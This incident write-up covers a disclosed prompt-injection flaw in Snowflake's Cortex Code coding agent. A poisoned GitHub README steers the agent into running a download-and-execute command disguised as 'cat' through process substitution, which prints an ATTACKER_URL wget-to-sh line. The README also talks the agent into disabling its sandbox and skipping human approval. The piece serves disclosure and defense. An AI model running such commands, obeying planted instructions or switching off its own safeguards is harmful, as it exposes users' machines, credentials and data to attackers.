A poisoned README talked Snowflake's coding agent out of its own sandbox
PromptArmor disclosed that Snowflake's Cortex Code (CoCo) CLI agent could be hijacked through indirect prompt injection. A malicious instruction hidden in a third-party GitHub repository README caused the agent to download and run a script, bypass its human-in-the-loop approval step, and - by being talked into setting an unsandboxed execution flag - run the attacker's command entirely outside its sandbox, using the victim's active Snowflake credentials. That opened the door to data exfiltration or dropping tables. The bypass abused process-substitution syntax that the agent's command allowlist failed to validate. Tracked as CVE-2026-6442, Snowflake validated it and shipped a fix in Cortex Code 1.0.25 on February 28, 2026; coordinated public disclosure followed on March 16, 2026. No confirmed real-world exploitation was reported.
Incident Details
Tech Stack
References
Snowflake Cortex Code, nicknamed CoCo, is a command-line coding agent from Snowflake - the data-warehouse company. Like the other agentic coding tools that have flooded the market, it can read a repository, write and run code, and execute shell commands to get a developer's task done. Because it is a Snowflake product, it also runs in an environment where the developer is typically already authenticated to Snowflake, with cached credentials sitting right there for the agent to use. PromptArmor found that a single poisoned file in an untrusted repository could turn that convenience into a remote-code-execution and data-theft chain. The flaw is tracked as CVE-2026-6442.
The agent was built with two safety mechanisms that should have prevented exactly this. It had a human-in-the-loop approval step, meaning risky commands were supposed to pause and ask the developer for permission before running. And it ran commands inside a sandbox, an isolated environment meant to keep a misbehaving command from touching the real machine. The exploit defeated both, and it did so by convincing the agent to defeat them.
The bait
The entry point is the now-familiar one: indirect prompt injection. The attacker did not need access to the victim's machine or Snowflake account. They only needed the victim to point Cortex Code at a repository the attacker controlled - say, asking the agent to explore or work on a third-party project from GitHub.
Buried in that repository's README was a block of instructions written for the agent rather than for a human reader. Developers clone strangers' repositories and have their tools read the documentation constantly; it is a routine, trusted action. When a coding agent treats a README as a source of instructions rather than as inert text to summarize, every README on the internet becomes a potential command channel. CoCo read the README as part of its workflow, and it followed what it found there.
Talking the agent past its own guardrails
Here is where it gets specific, and where the failure is more interesting than "the AI did a bad thing." The exploit chain had to clear two barriers.
Barrier one: the command allowlist and approval step. Cortex Code did not blindly run arbitrary shell commands. It checked commands against logic meant to decide what was safe to run without bothering the human. The problem was that this validation was a pattern-matching allowlist, and pattern-matching allowlists for shell commands are notoriously leaky. The agent treated a plain cat (a harmless command that prints a file) as safe. But shell syntax allows process substitution - the < <( ... ) construction - which lets you feed the output of one command into another. The injected payload took a shape along the lines of cat < <(sh < <(wget -qO- https://ATTACKER_URL/...)): dressed up to look like a benign cat, it actually downloaded a script from the attacker's server and piped it straight into a shell to execute. The validation logic saw cat, decided it was fine, and waved it through without triggering the human-in-the-loop approval that should have caught a download-and-execute.
Barrier two: the sandbox. Even a command that runs without approval was supposed to run inside the sandbox, contained. But the agent exposed a flag - in effect a dangerously_disable_sandbox switch - that turned the sandbox off for a command. Rather than attacking the sandbox technically, the injected instructions simply manipulated the model into setting that flag. The attacker did not break out of the box. The attacker asked the agent, in the language the agent was built to obey, to open the box from the inside - and it did.
Put those together and the attacker's downloaded script runs outside the sandbox, on the developer's actual machine, with no approval prompt. At that point it inherits whatever the developer's session has - including the cached Snowflake credentials. From there the documented impact is the grim usual: exfiltrate data, or drop tables. The Snowflake bulletin describes the result plainly as arbitrary code execution on the user's local device, with complete compromise of confidentiality, integrity, and availability on that device.
Non-deterministic by nature
One honest caveat runs through both PromptArmor's writeup and Snowflake's bulletin: exploitation is non-deterministic and model-dependent. Whether the injection lands depends on how the underlying model interprets the planted text on a given run. That is a genuinely strange property for a security vulnerability. A buffer overflow either overflows or it does not. A prompt injection against an agent might work nine times and fizzle the tenth, because you are not exploiting a fixed code path, you are persuading a probabilistic system. This makes such bugs harder to reproduce, harder to fully close with a single rule, and easier for a vendor to underestimate. It does not make them less dangerous; an attacker who can retry costs nothing by failing.
Why the allowlist was the wrong tool
The deeper lesson sits in barrier one. Snowflake's defense relied on an allowlist that tried to classify shell commands as safe or unsafe by their shape. Shell command lines are a tiny, hostile programming language full of substitution, piping, quoting, and chaining. Any allowlist that says cat is safe has implicitly promised that no dangerous command can be made to look like a cat, which is false. As Simon Willison noted in his writeup, allowlisting command patterns feels inherently unreliable for exactly this reason; the safer posture is to assume any command the agent runs can do anything a process can do, and to enforce isolation with a real sandbox operating outside the agent's control - one the agent cannot be talked into switching off. CoCo had a sandbox. It just also handed the agent the key to it and trusted the agent not to be socially engineered.
Snowflake's response
Snowflake's disclosure-and-fix process worked the way it should. PromptArmor reported the issue; Snowflake's security team validated it and shipped a fix in Cortex Code CLI version 1.0.25 on February 28, 2026. The fix applies automatically when users relaunch the CLI, with no manual action required beyond restarting the tool. Coordinated public disclosure followed on March 16, 2026, and the issue was assigned CVE-2026-6442, with the SentinelOne and Snowflake advisories documenting the bash-command-validation flaw and the prior-to-1.0.25 affected range.
There is no reported evidence that anyone exploited this in the wild before the patch. This is a hazard - a serious one, given the sandbox escape and the live Snowflake credentials in reach - but not a confirmed breach, and it should be read that way.
The lesson
The shape of this incident should be memorized by anyone shipping an agentic coding tool. The product was, by design, an agent that (1) reads untrusted content, (2) can run shell commands, and (3) operates next to real credentials. Its safety rested on a command allowlist the shell could fool and a sandbox the model could be talked into disabling. The Amazon Q wiper prompt, the GitLab Duo exfiltration, and EchoLeak all rhyme with this: give an AI broad capability and access, feed it attacker-controlled text, and the guardrails that depend on the model's own judgment will eventually be argued out of the way. The patch closed CVE-2026-6442. The category - autonomous agents that can be persuaded to turn off their own seatbelts - is still wide open.
Discussion